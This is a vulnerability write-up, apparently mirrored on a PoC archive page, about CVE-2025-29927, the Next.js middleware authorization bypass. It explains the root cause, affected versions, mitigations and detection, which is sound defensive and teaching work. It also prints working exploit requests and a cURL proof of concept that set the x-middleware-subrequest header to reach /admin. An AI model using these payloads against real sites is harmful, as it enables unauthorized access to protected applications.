Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
CVE‑2025‑29927 is a critical vulnerability (CVSS 9.1) in Next.js that allows attackers to bypass middleware‑based security checks.
Readme
# CVE‑2025‑29927 – Next.js Middleware Authorization Bypass
## Overview
**CVE‑2025‑29927** is a **critical** vulnerability (CVSS 9.1) in Next.js that allows attackers to bypass **middleware‑based security checks** such as authentication, access control, and redirects.
The issue affects applications deployed with `next start` or standalone output and occurs due to improper handling of the internal **`x‑middleware‑subrequest`** HTTP header. By crafting requests that include this header, an attacker can trick Next.js into **skipping middleware execution**, leading to unauthorized access to protected endpoints (e.g., `/admin`).
---
## Affected Versions
The following ranges are confirmed vulnerable:
- **11.x:** from **11.1.4** up to the latest 11.x release
- **12.x:** from **12.0.0** up to **12.3.4**
- **13.x:** from **13.0.0** up to **13.5.8**
- **14.x:** from **14.0.0** up to **14.2.24**
- **15.x:** from **15.0.0** up to **15.2.2**
---
## Root Cause – Why This Happens
Next.js uses the header `x‑middleware‑subrequest` **internally** to mark requests as subrequests initiated by middleware. This prevents infinite recursion when middleware calls endpoints that themselves invoke middleware.
However, **this header was never intended to be user‑controlled**. If an external client sets it manually, Next.js assumes the request is internal and **skips the middleware execution entirely**, resulting in a complete **authorization bypass**.
In Next.js 15.x, the behavior changed slightly: middleware calls are limited by a `MAX_RECURSION_DEPTH` of 5. But by **supplying the header with 5 values**, an attacker can still hit this condition and **bypass the middleware**.
*Execution flow of the vulnerability (source: Datadog Security Labs)*
---
## Exploitation
### 1. Basic Bypass
For versions prior to v15, a single `x‑middleware‑subrequest` value is enough:
```http
GET /admin HTTP/1.1
Host: vulnerable-site.com
x-middleware-subrequest: middleware
```
### 2. Recursive‑Depth Bypass (v15.x)
For v15.x, the attacker must include the value repeated **five times** to hit the recursion depth limit:
```http
GET /admin HTTP/1.1
Host: vulnerable-site.com
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
**cURL PoC**:
```bash
curl -L --request GET "https://target.com/admin" --header "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```
If `/admin` was protected only by middleware, the attacker now gains direct access.
---
## Impact
- **Authentication & Authorization Bypass** – Direct access to protected routes (`/admin`, `/api/private`).
- **Cache Poisoning / DoS** – Malformed or unauthorized responses may get cached, impacting other users.
- **Privilege Escalation** – If backend logic relies solely on middleware checks, attackers may escalate privileges.
---
## Mitigation
### **1. Upgrade**
Upgrade to **14.2.25**, **15.2.3**, or later.
### **2. Strip the Header**
If upgrading isn’t immediately possible, strip this header at the proxy or app server:
**Nginx:**
```nginx
proxy_set_header x-middleware-subrequest "";
```
**Apache:**
```apache
RequestHeader unset x-middleware-subrequest
```
**Express.js middleware:**
```js
app.use((req, res, next) => {
delete req.headers['x-middleware-subrequest'];
next();
});
```
### **3. Add Defense‑in‑Depth**
Do not rely solely on middleware for authorization—enforce access checks at the API/controller level.
---
## Detection
- **Log Analysis:** Look for external requests containing the `x-middleware-subrequest` header.
- **WAF/IDS:** Deploy updated detection rules (e.g., Snort, F5, Check Point) that block this header.
---
## References
- [NVD – CVE‑2025‑29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
- [JFrog Analysis](https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/)
- [Datadog Security Labs](https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/)
- [Vercel Postmortem](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)
---
### **Takeaway**
If your Next.js app uses middleware for access control and runs on `next start` or standalone mode — **patch now**. Until then, **strip the `x‑middleware‑subrequest` header** and enforce **redundant authorization checks** on sensitive routes.
File Snapshot
[4.0K] /data/pocs/9d8f7a1870ee40a4ea6ab0a173481d949bb8b682
└── [4.5K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →